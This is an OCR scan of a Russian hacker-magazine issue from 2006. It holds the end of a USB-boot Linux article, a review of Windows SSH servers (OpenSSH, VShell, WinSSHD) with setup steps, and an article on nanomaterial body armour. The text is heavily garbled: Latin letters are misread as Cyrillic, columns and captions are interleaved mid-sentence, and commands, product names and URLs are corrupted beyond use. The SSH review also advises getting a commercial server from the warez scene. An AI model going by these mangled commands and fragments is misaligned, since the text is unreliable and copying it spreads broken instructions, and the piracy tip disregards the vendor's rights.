ОНСР-клиент, и пакеты для работы с РРР, 
РРРоЕ (АЗОІ_) входят в стандартную пос- 






/7/Тулза унесет все свои секреты в могилу ил и же 
выдаст все данные, если ты скажешь пароль 



тавку. Выбор именно этого дистрибутива 
обусловлен еще и тем, что он изначально 
заточен для работы с ІІЗВ-накопителями, 
а это избавит нас от кучи геморроя. 
Установить систему не составит труда, 
но для этого нужно немного подгото- 
виться. Позаботься, чтобы на флешке 
было достаточно свободного места, а 
лучше вообще отформатируй накопи- 
тель, предварительно сделав бэкап всех 
файлов. Причем не стандартной утилитой 
ѴѴіпбоѵѵз, а всемирно признанной тулзой 
НР ІІЗВ ОізкЗФгаде РогтаіТооІ. Далее с 
помощью ѴѴіпРАР можешь смело распа- 
ковать содержимое ізо-образа в корень 
накопителя. Но для того, чтобы загрузить- 
ся с флешки, этого будет недостаточно. 
Нужно еще сделать флешку загрузочной, 
что реализуется с помощью специальной 
утилиты Зузііпих. Требуется распаковать 
архив с программой в одну из папок и 
запустить со следующими ключами: 
зузііпих. ехе -КЗ: 

Здесь (3 : — это название нужного диска 
с флешкой. И вот только теперь все 
готово: убойный ІІЗВ-накопитель в твоих 
руках. Большинство современных ВІОЗ 
поддерживают загрузку с флешки в 
одном из режимов ІІЗВ-І-ЮО или ІІЗВ-2ір. 
Функционально они ничем не отлича- 
ются, поэтому для загрузки с флешки 
достаточно установить любой из них. 

И вот еще бонус: во время обычной 
загрузки в винду открой свой накопитель 
и среди файлов запусти бзІ-ѵѵіпбоѵѵз.ЬаІ. 
И смотри, что произойдет :). 

Найди свой софт 

Естественно, набор софта каждый 
составляет под себя, исходя из своих 
нужд и соображений. Я рассказал лишь 
о тех программах, которые постоянно 
использую с флешки сам. Атебе самому 
предстоит найти программы для записи 
болванок, просмотра изображений и 
много чего еще на специализированных 
сайтах. Я дам тебе список: еп.ѵѵікіребіа. 
ога/ѵѵікі/изі оі рогІаЫе арріісаііопз . 
ѵѵѵѵѵѵ.рогІаЫеаррз.сот . ѵѵѵѵѵѵ.ііпѵаррз. 
ога/ . зіапбаіопе.аізрасе.ога/ . ѵѵѵѵѵѵ.по- 
іпзіаіі.сот . Действуй! :)□-:= 
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Винловое ЗЗН'частье 

Тестируем 55Н-серверы для ѴѴІпсІо\л/5 



ОДИН ЗНАКОМЫЙ НЕДАВНО ОБЪЯВИЛ: «55Н-СЕРВЕР МОЖНО УСТАНАВЛИВАТЬ 
ТОЛЬКО ПОД НИКСАМИ!». МОИ ВОЗРАЖЕНИЯ ОН В РАСЧЕТ НЕ БРАЛ И С ПЕНОЙ 
У РТА ДОКАЗЫВАЛ МНЕ, ЧТО ПОД ВИНДОЙ ТАКИЕ ИЗЫСКИ В ПРИНЦИПЕ НЕВОЗ- 
МОЖНЫ. СПОР ЕСТЬ СПОР. ПРИШЛОСЬ ЕМУ ДЕЛОМ ДОКАЗЫВАТЬ ОБРАТНОЕ. 
СЕРВАК ЗАВЕЛСЯ С ПЕРВОГО РАЗА И Я, ПРИЗНАТЬСЯ, САМ УДИВИЛСЯ, НАСКОЛЬ- 
КО ХОРОШО ВСЕ ЗАРАБОТАЛО. 



Недра защищенного соединения 

После недолгого изучения темы и серфинга инета оказалось, что под- 
ходящего софта не так уж и мало. Каждая найденная мною программа 
могла похвастаться отменной реализацией протокола, а некоторые и 
вовсе предоставляли кучу дополнительных возможностей, тем самым 
заслужив место в сегодняшнем обзоре. Но прежде чем приступать к 
тестированию, предлагаю вкратце разобраться, что вообще представ- 
ляет собой этот 35Н. Без базового набора знаний ты рискуешь поте- 
ряться среди многочисленных опций и параметров сервера. Чтобы в 
дальнейшем исключить недопонимание, включай мозги и внимательно 
вникай в материал. 

Все с пеленок знают, что протокол іеіпеі ввиду отсутствия шифрова- 
ния небезопасен. Однако необходимость подключения к командной 
строке удаленного компьютера встречается сплошь и рядом. Так вот 
ЗЗН (Зесиге ЗЬеІІ) — по сути, защищенная версия Іеіпеі Этот про- 
токол, также предназначенный для удаленного администрирования, 
более защищен. Безопасность достигается за счет непрерывного 
шифрования трафика, жесткой аутентификации как пользователей, 
так и хостов, а также всевозможных проверок целостности данных. 
Остановимся на этом подробнее. 

Всего существует три способа идентификации клиента: с помощью 
логина/пароля, по ІР-адресу и по публичному ключу клиента. Приоритет 
при подключении к серверу выставлен следующим образом: сначала 
клиент пытается аутентифицироваться своим ІР-адресом, затем пуб- 
личным ключом и, в последнюю очередь, посредством интерактивного 
ввода пароля. После аутентификации на базе имеющихся у клиента 
и сервера двух пар ключей (каждая состоит из одного секретного и 
одного публичного) генерируется ключ симметричного шифрования. 
Схема генерации такова, что злоумышленник не сможет расшифро- 
вать ключ, даже перехватив его. Зато все данные, которые в даль- 
нейшем будут передаваться по защищенному каналу, зашифрованы 
именно этим ключом. Для криптования трафика обычно используется 
алгоритм АЕ5, но администратор в любой момент сам может указать, 
какому алгоритму отдать предпочтение. Исправляя серьезные уяз- 
вимости первой версии протокола, ЗЗН2 дополнительно использует 
средства для проверки целостности данных. В частности, вместе с 
данными посылаются контрольные суммы формата ЗНА или ІѴЮ5, 
которые гарантированно исключают возможные подмены пакетов и 
вообще изменения трафика. 

Помимо доступа к удаленной командной строке, ЗЗН предоставляет 
ряд других возможностей. Первая — это туннелирование. После того 
как установлено ЗЗН-соединение, можно безопасно роутить через 



туннель трафик одного или сразу нескольких приложений. Это не 
только позволяет обойти файрвол, но еще и гарантированно скроет 
данные от прослушивания. Не стоит забывать и о безопасной переда- 
че файлов (Зесиге Іііе Ігапзіег), реализуемой на базе протокола ЗРТР. 
Такая возможность будет очень кстати, если частенько требуется 
передавать документы особой важности. Теперь, когда ты получил 
общие сведения о протоколе, приступим к программной части вопро- 
са. И откроет наш обзор всем известный ОрепЗЗН. 

ОрепЗЗН іог ѴѴіпсІоѵѵз 3.8.1 

Бесплатно открытые исходники 
ззбѵѵіпсіоѵѵз.зоигсеіогде.пеі 

Судьбою многих других успешных юниксовых программ ОрепЗЗН, не без 
усилий группы разработчиков судѵѵіп, был портирован на ѴѴіпбоѵѵз-плат- 
форму. Событие поистине знаменательное, особенно с учетом того, что 
этот продукт считается наиболее продвинутой и самой полной реализа- 
цией ЗЗН-протокола. Будь уверен: здесь реализовано все, поэтому если 
ты чего-то не нашел, то вывод один — плохо искал. 

Омрачить настроение, особенно неопытному пользователю, может 
отсутствие графического интерфейса программы. По крайней мере, в 
стандартном пакете ОрепЗЗН СІІГшной оболочки для настройки демо- 
на ты не найдешь. Следуя канонам серьезного серверного ПО, кон- 
фигурирование осуществляется исключительно с помощью текстовых 
конфигов, поэтому заранее запасись блокнотом и терпением, чтобы 
прочитать мануал. Основной конфигурационный файл — ззИб_соп!ід 
— находится в папке ОрепЗЗН/еіс. По умолчанию конфиг настроен 
так, что ОрепЗЗН может стартовать без какой-либо дополнительной 
настройки. Главное — указать в конфиге используемый порт, если 
стандартный 22-ой занят (опция Рогі). Что касается остальных опций, 
предназначенных для настройки авторизации пользователя, шифро- 
вания и логирования, то их во время первого старта можно не трогать. 
Другое дело, что демон должен знать, кому разрешать соединения, 
а кому — нет. Поэтому приступим к определению пользовательских 
групп и аккаунтов. Делается это следующим образом: 

1) Для начала нужно создать файл с описанием групповых разреше- 
ний пользователей: 



ткдгоир -I >> ..\еіс\дгоир 
ткдгоир -сі >> ..\еіс\дгои| 



050 



ХАКЕР 07 /91/ 06 





ПанельуправленияѴапсІукеЗоЙѵѵаге Задаем ключи сервера с помощью администраторс- 

ѴЗИеІІ. кого интерфейса ѴѴіпЗЗРЮ 




• ІР-спуфинга, когда атакующий компьютер 
посылает пакеты от имени разрешенного 
хоста. 

• ОІ\ІЗ-спуфинга, в случае, если кому-то удас- 
тся подделать пз-записи ОЫЗ-сервера. 

• Снифинга и утечки паролей, которые 
исключены за счет шифрования данных. 

• Фальсификации данных, которая исключе- 
на благодаря непрерывной проверке данных 
с помощью ІѴЮ5-хэшей. 

Единственное, что может сделать хакер, — 
это оборвать установленное соединение или 
перехватить данные, которые в любом случае 
не сможет расшифровать. 



Первая команда 
применима к локальным группам (то есть 
тем, что прописаны на твоем компьютере), вторая — к домен- 
ным. Если доменом в твоей сети и не пахнет (что очень вероятно), то 
выполнение второй команды прервется с соответствующей ошибкой. 
Ничего страшного. Обрати внимание, что в команде нужно использо- 
вать именно «>>» для добавления информации в конец файла, а не 
перенаправление потока «>», которое полностью перезапишет файл 
.АеІсХдгоир, удалив ранее внесенные записи. 

2) На втором этапе мы добавляем авторизированного пользователя 
в файл раззѵѵб с помощью команды ткраззѵѵсі. Для локальных поль- 
зователей опять же указывается ключ «-І», а для тех, кто работает в 
домене, — «-б». В общем случае можно сделать так: 



ткраззѵѵсі -I -и изетате >> . АеІсХраззѵѵ 
ткраззѵѵсі -б -и изетате » . Аеі:с\разз\ 



было уже несколько статей по тонкой настройке ОрепЗЗН, и большая 
часть материала применима для версии под ѴѴіпбоѵѵз. А во-вторых, 
в состав инсталляционного пакета входит отличная документация, 
которая поможет тебе выжать из сервиса максимум, включая такие 
вкусности, как различные виды аутентификации, туннелирование 
пакетов, ЗРТР и ЗСР. Ах да, чуть не забыл! ОрепЗЗН — это единствен- 
ный бесплатный пакет из представленных в обзоре программ, который 
вдобавок распространяется с открытыми исходниками. 

Ѵапсіуке ѴбНеІІ 2.6 

ЗИагеѵѵаге 

ѵѵѵѵѵѵ . ѵап бу ке . со т 

Сложно представить, что кто-то сможет составить здоровую конку- 
ренцию ОрепЗЗН, но авторитетные ребята из Ѵапбуке, похоже, с 
этой задачей справились. Результатом их многолетнего труда стал не 
только известный ЗНН-кпиент ЗесигеСРТ, но еще и демон, в котором 
реализованы все фишки протокола ЗЗН, а также удобные средства 
для администрирования. 

Устанавливается ѴЗИеІІ без проблем. Без лишних загвоздок и замо- 
рочек, как это обычно бывает с серверными приложениями. И что 
особенно важно: сразу после установки демон вполне работоспосо- 
бен — нужно лишь перегрузиться. Но для начала посмотрим, какие 
возможности предлагают разработчики. 

Окно программы — это интерфейс для управления сервером. По сути, 
это одна большая панель со всевозможными настройками, тематически 
сгруппированными. В разделе ОепегаІ содержатся основные параметры 
сервера. Если требуется изменить порт, на котором будет висеть сервер 
или же командный интерпретатор, предоставляемый пользователям по 
умолчанию, то достаточно просто изменить значения соответствующих 
параметров. Обращаю внимание, что, если вместо стб.ехе указать путь 
до РоѵѵегЗИеІІ (САРгодгат РіІезХѴѴіпбоѵѵз РоѵѵегЗИеІКѵІ.ОХроѵѵегзИеІІ.ехе), 
удаленные пользователи не только ощутят прелести безопасного соеди- 
нения, но еще и всю мощь нового командного интерпретатора от МісгозоИ 
В этом же разделе можно задать параметры шифрования и сжатия дан- 
ных, в частности, выбрать используемые алгоритмы и выбрать ключ хоста 
(для его создания используется встроенная утилита — ѵкеудеп). 

ѴЗИеІІ отличается большим разнообразием механизмов аутентифи- 
кации. Поддерживается и стандартная схема на базе риЫіс/ргіѵаІе 
ключей, интерактивный ввод с клавиатуры, КегЬегоз, цифровые 
сертификаты Х.509 или ВАОІІІЗ-серверы. Все это со 



Имя пользователя (изегпате) нужно брать не с потолка: аккаунт с 
таким именем должен существовать на локальной машине или на кон- 
троллере домена. Кстати, если убрать ключ «-и» и имя пользователя, 
то будут добавлены сразу все пользователи локального компьютера 
или домена, включая системные и гостевые логины. Таким образом, 
ты избавишь себя от нудной работы по занесению каждого юзера 
в отдельности. В файле \еІс\раззѵѵсІ можно также изменить путь до 
командного интерпретатора, если возможности стандартного стб.ехе 
кого-то из клиентов не устраивают. 

3) Далее остается только запустить сервис и приступать к тестиро- 
ванию: 



пеі зіагіорепззіпсі 



Проверить работоспособность демона можно банальным соеди- 
нением к 22-му порту локального компьютера. Само собой, выбор 
ЗЗН-клиента на результат никак не влияет, но не забывай о том, что 
в состав ОрепЗЗН входит собственный клиент, который вызывается 
следующим образом: ззИ <изег@зегѵегпате>. 

Несмотря на удачное соединение, не спеши забивать на дальнейшее 
конфигурирование сервера. ОрепЗЗН имеет множество нюансов, 
которые могут реально пригодиться и обезопасить сервер, но вдавать- 
ся в детали сейчас я не вижу смысла. Во-первых, в «Юниксоиде» у нас 



ч ^ , р ай 



знанием дела 






х> 



ѴѴіпбоѵѵз Ассезз Зегѵег ( ѵѵѵѵѵѵ.іохіізоііѵѵаге. 
сот/ѵѵас/зегѵег іпІго.рИр ) — это еще один 
ЗЗН-демон под винду. Программа сильно 
уступает представленным в обзоре продук- 
там, но есть у нее одна фишка, о которой я не 
могу не рассказать. В состав демона входят 
десяток текстовых утилит, представляющих 
собой полные аналоги виндовых приложений: 
проводника, редактора реестра, монитора 
событий (еѵепі ѵіеѵѵег), панели для управления 
пользователями и группами и даже сапера. 
Представляешь: все те же возможности и 
окошки, но в консоли. Разница лишь в том, 
что окна отображаются в текстовом режи- 
ме с помощью АЗСІІ-символов. Рекомендую 
выбрать из архива с программой нужные тебе 
утилиты (каждая из них имеет свой ехе-файл) 
и взять их на вооружение. 
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Настройка ОрепЗЗН осуществляется с по- 
мощью текстового конфига — ззІпсІ_сопЯд. 




Переработанный Еѵепі Ѵіеѵѵег — та же функциональность, 
но с консольным интерфейсом. 



можно настроить в разделе АиФіепІісаІіоп. Параметры доступа зада- 
ются как сразу для всех, так и для любого конкретного пользователя 
в отдельности. В последнем случае он должен быть создан в системе. 
Причем разграничение прав осуществляется с помощью удобного 
списка контроля доступа (АСЕ — Ассезз Сопігоі І_ізІ). Буквально 
несколькими кликами мыши админ может запретить или разрешить 
для каждого аккаунта доступ, выполнение команд, запуск приложений, 
возможности 5РТР или перенаправление портов. 

Я не зря упомянул про 5РТР — соответствующий сервер встроен в 
ѴЗИеІІ по умолчанию. И что особенно приятно, реализован он на самом 
высоком уровне. Суди сам: здесь тебе и механизм виртуальных дирек- 
торий, позволяющий создавать логические контейнеры для хранения 
данных, и даже специальная реализация триггеров, особым образом 
реагирующих на активность пользователей. Например, для каждого 
залитого юзером файла можно запустить сканер и автоматически 
проверить его на вирусы. 

Подобный продукт не мог обойтись без возможности удаленного 
управления. Разработчики очень умело подошли к этому вопросу и 
реализовали администраторскую утилиту в виде обычного консоль- 
ного приложения — ѵзИеІІсопІід.ехе. В итоге администратору доста- 
точно установить 58Н-соединение и, обладая достаточными правами, 
запустить из папки ѴЗИеІІ конфигурационную консоль. В заключение 
скажу, что реализации ѴЗНеІІ существуют не только под ѴѴіпсІоѵѵз, но 
и любых никсовых платформ. Правда, разработчики справедливо 
требуют нехилое количество зеленой капусты за свой продукт, да и 
скачать на официальном сайте этот продукт не представляется воз- 
можным. Ребята запрещают вывозить столь навороченные технологии 
из страны, а поэтому придется искать софтину на варезной сцене. Но 
кто ищет — тот всегда найдет. Практика показала, что этот вопрос 
решается за пару минут. 

ѴѴІП88ІЮ 4.15а 

ЗИагеѵѵаге 

ѵѵѵѵѵѵ.ЬіІѵізе.сот/ѵѵіпззІтсІ.ІтІтІ 

В отличие от предыдущих программ ѴѴіпЗЗНО предназначена для 
работы исключительно под виндой, но в нашем случае этот факт боль- 
шого значения не имеет. Во время инсталляции ѴѴіпЗЗНО регистриру- 
ется в системе в качестве системного сервиса, после чего на экране 
появляется простенькая панель для администратора. Разработчики 
приложили массу усилий, чтобы сразу после установки сервис был 
готов к работе. В общем у них это получилось, но необходимость хотя 
бы в минимальной настройке все же есть. 

Итак, панель управления состоит из нескольких вкладок: первая — для 
мониторинга, вторая — для работы с ключами, третья для конфигу- 
рирования сервера. Если ранее был создан бэкап, то конфиг можно 
быстро импортировать из файла. Нам же придется настраивать все 
с нуля, поэтому жмем на кнопку « Есііі/ѵіеѵѵ зеіііпдз». Спешу предупре- 
дить: не стоит пугаться разнообразия настроек, которое предложит 
появившееся окно ЗЗН-сервера. Несмотря на огромное количество 



всевозможных опций и параметров, ориентироваться среди них очень 
просто, и при первом же знакомстве оказывается, что бояться нечего. 
Например, раздел Зегѵег отвечает за выбор интерфейсов и портов, на 
которых программа будет принимать подключение. Здесь же задаются 
параметры логирования (настройки, кстати, богаче, чем аналогичные 
в ѴЗИеІГе). А в раздел АІдогіФтз ты можешь выбрать используемые 
программой алгоритмы шифрования, но лучше все оставить, как есть. 
Не вызовет затруднения и работа с юзерскими аккаунтами. Благо 
ѴѴіпЗЗНО отлично взаимодействует с группами и пользователями 
операционной системы, что позволяет, во-первых, избавиться от пов- 
торного набора юзеров в базу, а во-вторых, предоставляет отличные 
возможности по управлению ими. Важно, что любые специфические 
настройки можно задать для пользователя и каждой группы отдельно. 
Взять, к примеру, командный интерпретатор: некоторые продвину- 
тые клиенты, возможно, захотят использовать возможности нового 
РоѵѵегЗИеІІ, однако другие, которые о нем никогда не слышали, пред- 
почли бы использовать старый добрый стсі.ехе. С помощью ѴѴіпЗЗНО 
это легко реализуется. Или вот еще интересная деталь: можно так 
настроить демон, что он будет реагировать на некоторые события 
— вход и выход пользователя, например. Реакция, правда, может быть 
только одна — запуск исполняемого файла. Но даже с ее помощью 
вполне реально наладить любую автоматику. Впрочем, использовать 
системные аккаунты не всегда удобно, поэтому ѴѴіпЗЗНО позволяет 
создать еще и виртуальные, применимые только для ЗЗН-сервера, 
учетные записи. С точки зрения сервера, они мало чем отличаются от 
обычных, однако требуют более детальной настройки. Особо удобной 
такая фишка становится при активном использовании ЗРТР-сервера, 
избавляя нас от необходимости засорять систему лишними, и очень 
часто временными, учетными записями. 

После минимального конфигурирования ѴѴіпЗЗНО возьмется и за обес- 
печение твоей анонимности, направляя все соединения на удаленный 
прокси/сокс. Классический вариант: установить демон ѴѴіпЗЗНО на 
выделенном сервере или \ЮЗ (виртуальный выделенный сервер), тун- 
нелировать весь свой трафик через ЗЗН и уже оттуда выпускать через 
внешнюю проксю в Уругвае. О том, как наладить подобную штуку, мы 
уже писали. 

Хочу похвалить административный интерфейс программы. Очень 
приятно, что все параметры и опции сопровождаются подробны- 
ми комментариями. Не нужно постоянно подрываться и смотреть 
хелп — просто последовательно читаешь подсказки и задаешь нуж- 
ные параметры. 

Злоключение 

Поднять ЗЗН-сервер под виндой не только можно, но еще и очень 
просто. И если кто-то возьмется оспаривать твое мнение, смело про- 
демонстрируй свои навыки. Каждая из вышеприведенных программ 
позволяет настраивать сервак за пару минут. А если покопаться в 
документации, основательно разобраться и поэкспериментировать с 
настройками, то тебе и вовсе будут под силу чудеса высшего пило- 
тажа. Как, собственно, и подобает грамотному администратору и, 
конечно же, хакеру. □□ 



1969 ТеІпеГ 

Первая версия этого протокола зародилась 
еще во времена огромных мэйнфреймов и 
подключающихся к ним терминалов (монитор 
и клавиатура). О безопасности тогда никто 
не задумывался. 



1995 ЗЗН1 

На смену небезопасному іеіпеі’у и юниксовым 
командам (гіодіп, гзИ, гор) пришла первая вер- 
сия протокола ЗЗН. Впервые было использо- 
вано шифрование передаваемых данных, но 
очень скоро в протоколе были обнаружены 
критические уязвимости. 



1997 ЗЗН2 

Все недоделки, приводящие к атакам «Мап- 
іп-Фіе-тісІсІІе», были исправлены во второй 
версии протокола. Кроме того, ЗЗН2 обладал 
улучшенным механизмом передачи файлов 
и гарантировал целостность передаваемой 
информации. 
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ІЮРИЙ СВИДИНЕНКО АКА І_А2АВІІ8 

/ МЕТАМОПРН@ѴАЫОЕХ,ВІІ / 



іКАК ТЫ УЖЕ ДОГАДАЛСЯ, РЕЧЬ В ЭТОЙ СТАТЬЕ ПОЙДЕТ О БРОНЕЖИЛЕТАХ. НО НЕ О СТАРЫХ ИЛИ 



СОВРЕМЕННЫХ, А О ТЕХ, КОТОРЫЕ ТОЛЬКО ИСПЫТЫВАЮТСЯ, А НЕКОТОРЫЕ ИЗ НИХ ВООБЩЕ 



'СУЩЕСТВУЮТ ПОКА ТОЛЬКО НА БУМАГЕ. ОДНАКО ЭТО НЕ МЕШАЕТ ИМ ЧЕРЕЗ НЕСКОЛЬКО ДЕСЯ 



ИЛЕТИИ СТАТЬ ТАКИМ ЖЕ ПРИВЫЧНЫМ И ПОВСЕМЕСТНЫМ СРЕДСТВОМ ЗАЩИТЫ, КАК, НАПРИ 



МЕР, ГАЗОВЫЙ баллончик. 



В развитых странах армейская система такова, 
что при гибели одного-единственного солдата 
на поле боя армия выплачивает родственникам 
по страховке огромные суммы денег. Поэто- 
му, естественно, армиям невыгодно, чтобы 
их солдаты на поле боя умирали от действий 
неприятеля. Пусть лучше они умирают дома на 
пенсии :). Как ты знаешь, жадность 



почти все европейское рыцарство), то сегодня 
один хороший диверсант в тылу врага может 
сделать много пакостей. 

ІДа и на поле боя стали действовать осторож- 
нее. Вперед посылаются беспилотные роботы, 

пехота. 



вает 90% боеприпасов. Ты же в это время ог- 
ромными прыжками добираешься до негодяев 
и показательно ломаешь им хребет. 
Напоминает экшн-игру в стиле НаІНЛе или 
ОООМ?Тем не менее, есть все предпосылки 
к тому, что войны будущего могут иметь много 
общего с сетевыми баталиями в командный 
РРЗ. 



затем тяжелая техника, и уж потом 
Но даже при таком раскладе есть возмож- 
ность, что тебя снимет из рокет лаунчера ка- 
кой-то хитрый мусульманин/китаец/вьетнамец 
(нужное подчеркнуть). 

іА вот представь такую картину: враги безоста- 
новочно пуляют по тебе из подручного оружия, 
Іа от тебя, как отжепезного Феп икса, отскаки- 



двигатель 

Іпрогресса, благодаря которой развиваются се- 
мимильными шагами военное обмундирование 
и средства индивидуальной защиты. 

Если раньше брали тупой силой (например, 

Ів битве при Айзенкѵпе в 1 415-м голѵ полегло 



От железа к силикону 

Былые времена, когда крепкий панцирь или 
кольчужная рубаха вселяли веру в рыцаря, 



Іаже броне; 



Имплант 



Железный воаго 







любит отечественная милиция и ОМОН, по 
сути дела, не гарантируют полной сохранности 
тела при серьезной заварушке на войне. О 
шлемах даже говорить не приходится — сегод- 
ня меткому снайперу ничего не стоит попасть в 
незащищенные шлемом части лица. 

Но, несмотря на это, сегодня отечественные 
кузнецы предлагают довольно неплохие 
бронежилеты-комплекты. Например, костюм- 
тройка, который полностью защищает тебя 
от пистолетных пуль и ударов штык-ножом. 

Это стало возможным благодаря полимерно- 
му материалу кевлару, которым защищена 
плечевая и паховая области. А, например, 
универсальный бронежилет повышенной пу- 
лестойкости «ЗУБР», состоящий из стальных 
и керамических бронеэлементов, защитит 
не только от автоматных очередей, но и от 
винтовочных выстрелов пулями с термоупроч- 
ненным и бронебойным сердечником. 
Технологии керамической и кевларовой 
брони тоже имеют ограничения по прочности, 
поэтому для увеличения защиты оружейники 
обратились за советом к ученым и инжене- 
рам-материаловедам, работающим с такими 
экзотическими материалами, как нанотрубки и 
круглые молекулы углерода С60, называемые 
фуллеренами. Оказалось, что их исполь- 
зование в персональной броне позволит 
значительно уменьшить ее вес при увеличении 
степени защиты. 

Кроме фуллеренов и нанотрубок, существуют 





«неорганические, подобные фуллеренам, 
наноструктуры». Сточки зрения химии, они 
представляют собой сульфиды металлов: 
вольфрама, молибдена, титана и ниобия. 
Именно их ученые научились синтезировать 
в непривычных формах — в виде нанотрубок 
и сфер, подобных углеродным нанотрубкам и 
шарикам-фуллеренам с поперечником всего в 
десятки атомов. 

Составленные из таких частиц материалы 
показывают необычайно высокую прочность и, 
кроме этого, могут превосходно впитывать (аб- 
сорбировать) кинетическую энергию ударного 
воздействия, сохраняя после воздействия 
начальную форму. 

Сегодня компания АрЫапо разрабатывает раз- 
личные наноматериалы для защиты человека 
от воздействия взрывной волны, механических 
и химических воздействий. Первые образ- 
цы на основе вольфрама останавливали 




Стлѵктѵла кевлала 



Н а н о м ателиальшн^основ^фуллелено^^н^ 

нотрубокИ 




Вот так одевались ланьшѳі 



стальные снаряды, летящие со скоростью 
1 ,5 километра в секунду (при этом в точке 
удара создавалось давление до 250 тонн на 
квадратный сантиметр), а также выдерживали 
статическую нагрузку в 350 тонн на квадрат- 
ный сантиметр. Теперь АрЫапо намерена 
перейти к развитию аналогичных образцов на 
основе титана, которые, как ожидают изоб- 
ретатели наноматериалов, окажутся прочнее 
вольфрамовых. В настоящее время АрЫапо 
за день может изготовить только несколько 
килограммов нового материала, но через 
полгода она намерена нарастить мощность до 
1 00-200 килограммов, а к 2007 году — создать 
массовое производство с выходом нескольких 
тонн наноматериала в день. 

Еще один недостаток практически всех сов- 
ременных бронежилетов — невозможность 
защитить те части тела солдат, которым необ- 
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Зкзоскелет закупоривает солдата с переломом 
й кле тки до прибытия врача 



ходимы подвижность и гибкость — в первую 
очередь, руки и ноги. 

Поэтому многие исследователи-материалове- 
ды склоняются к выводу, что отдельные части 
солдатской брони должны принять жидкую 
форму. И недавно американские ученые из 
университета Делавэра (Ііпіѵегзііу оі Эеіаѵѵаге) 
и научно-исследовательской лаборатории 
армии США (11.8. Агту ВезеагсИ І_аЬогаФ>гу) 
создали смесь из микроскопических частиц 
кварца в гликоли полиэтилена и на его основе 
уже сконструировали жидкую броню для воен- 
ных — особое вещество 8ТР (8Иеаг ТИіскепіпд 
РУб). В обычном режиме ткань сохраняет 
гибкость, но когда материал встречается с 
внезапным напряжением, вроде попадания 
пули, частицы кварца автоматически создают 
дополнительное сопротивление. А когда ма- 
териал погружают в 8ТР, кварцевые частички 
поглощаются волокнами ткани. Это позволяет 
пропитать жидкой броней гибкие участки сол- 
датской униформы, повышая ее защиту. 

Еще одни способ защиты совершенно 
незащищенных участков — нанесение на них 
специального покрытия. Как ты думаешь, как 
защитить от пулевого ранения лицо солда- 
та? Даже самый крепкий шлем с защитным 
прозрачным щитком не защищает от прямого 
попадания в лицо. 

Оказывается, снабдить защитой можно даже 
плексигласовые прозрачные панели шлема! 
Компания ЫапоТгіІоп выпустила для этого 
покрытие ЫапоТиІ™, которое в несколько раз 
увеличивает прочность пластика. ЫапоТиІ™ 
состоит из наночастиц в растворе. При 
нанесении на пластиковую поверхность они 
образуют сверхтвердую пленку, которая не 
только защищает от биологических и хими- 
ческих агентов, но и от попадания пули! Так, 
при проведении одного из тестов, в защитное 
стекло солдатского шлема, обработанное 
ІМапоТиІ™, выпустили несколько пуль, и они не 
смогли расколоть обработанный наночастица- 
ми материал! 

Возможно, впоследствии и такой защиты 
будет мало, поскольку уже появляются первые 
портативные образцы мощного лазерного 
оружия, способного пробить тепловым ударом 
(ведь большая часть бронежилетов защи- 
щает только от кинетического воздействия) 



практически любой тип современной брони. 
Так что развитие и улучшение материалов для 
бронежилетов еще впереди. 

РООМ 2020 

По большому счету, бронезащита не стала 
«умнее», она всего лишь стала прочнее и 
легче. Одно из достижений компьютерных РР8 

— появление полоски брони и жизни — может 
вскоре стать неотъемлемой частью любого 
солдатского костюма. В игре очень удобно 
следить за состоянием своего здоровья и 
количеством брони по цветным полоскам-мар- 
керам. Я уже не говорю о состоянии боезапаса 

— отслеживание этой информации в реальном 
времени просто необходимо любому солдату. 
Частично эта проблема решена у пилотов-ис- 
требителей и бомбардировщиков — у них есть 
специальный интерфейс на шлеме, который 
показывает жизненно важные данные полета. 
Некоторые модели шлемов проектируют мини- 
монитор на сетчатку глаза, что существенно 
упрощает восприятие информации. Однако у 
простой пехоты по-прежнему такой возмож- 
ности нет. 

Но первые шаги по внедрению такой системы 
уже сделаны. Дело в том, что просто «прикру- 
тить» такой информационный шлем к обычно- 
му снаряжению бессмысленно. Оно просто не 
сможет обеспечить компьютер шлема нужной 
информацией о состоянии тела солдата, 
о прочности брони и о боезапасе, поэтому 
новый солдатский интерфейс подразумевает 
наличие умного костюма, такого, например, 
как у Г ордона Фримена. 

Может быть, как раз реальным прототипом 
Г ордона Фримена, Эдвином Томасом, и был 
создан Институт солдатских нанотехнологий 
на базе Массачусетского технологического 
института (МТИ) в США. Он был построен 
специально для разработки экипировки и 
вооружения «солдата будущего». 

Основатели Института со стороны МТИ и 
армия США выделили на исследования грант 
размером в 50 миллионов долларов. Тем не ме- 
нее, Эдвин Томас заявил, что «на разработку 
военного обмундирования и оружия, сущест- 
венно улучшенного с помощью нанотехноло- 
гий, потребуется не менее 20 лет». 

В институте ведется разработка в рамках семи 




проектов, кажды# из которых составл 
льный «кирпичик» будущего солдата, 
участвуют 37 ученых из 8 разных отде| 

МТИ. 

Эдвин и исследователи предлагают новік 
концепцию солдата. Они хотят сделать ъ з 
человека, обмундирования и оружия некий 
гибрид, элементы которого будут настолько 
тесно связаны между собой, что полностью 
экипированного солдата будущего можно 
будет назвать отдельным организмом — авто- 
номным, быстродействующим, выживаемым. 
По словам Томаса, с помощью традиционных 
технологий таких результатов достичь трудно, 
но возможно. С помощью современных нано- 
технологий их достичь еще трудней, но Томас 
надеется на их дальнейшее развитие. 

На недавней выставке в Капитолии члены 
Конгресса США смогли увидеть две «демонс- 
трационные модели » солдат: образца 201 0 и 
2020 годов. Там же был представлен видеоро- 
лик, объясняющий работу новых костюмов и их 
отличие от современных. 

Модель 2010 года была названа исследова- 
телями «Р-16 на ногах», поскольку система 
позиционирования и навигации, расположен- 
ная в заплечном рюкзаке солдата, позволяет 
проделать все те операции по навигации, что 
и компьютеры самолета Р-1 6. «Этот солдат 
может пересечь джунгли, ни разу не сбившись 
с пути», — говорит один из исследователей, 
работающих в МТИ, Де Гэй, обслуживающий 
презентацию в Капитолии. 

Шлем солдата оснащен сенсорами, детекти- 
рующими вибрации костей черепа и челюстей. 
Эта система успешно заменяет обычный 
микрофон, использовавшийся ранее. Весь 
обмен информацией будет производиться че- 
рез проектор, который передает информацию 
прямо на сетчатку. Таку солдата появится ряд 
«операционных окон», которые будут инфор- 
мировать солдата о приказах, о противнике, 
заменят бинокль и приборы ночного видения, а 
также будут отображать состояние организма. 
По «видимым» размерам экран будет сопоста- 
вим с 17" монитором. 

Медицинский компьютер модели 2020 года 
передает важнейшие параметры солдата на 
камеру, проектирующую изображение на 
сетчатку глаза. Солдату показывают основные 
физиологические параметры: пульс, карди- 
ограмму, температуру тела и окружающей 
среды, радиоактивность среды, калориметр, а 
также количество выпитой им воды. Контроль 
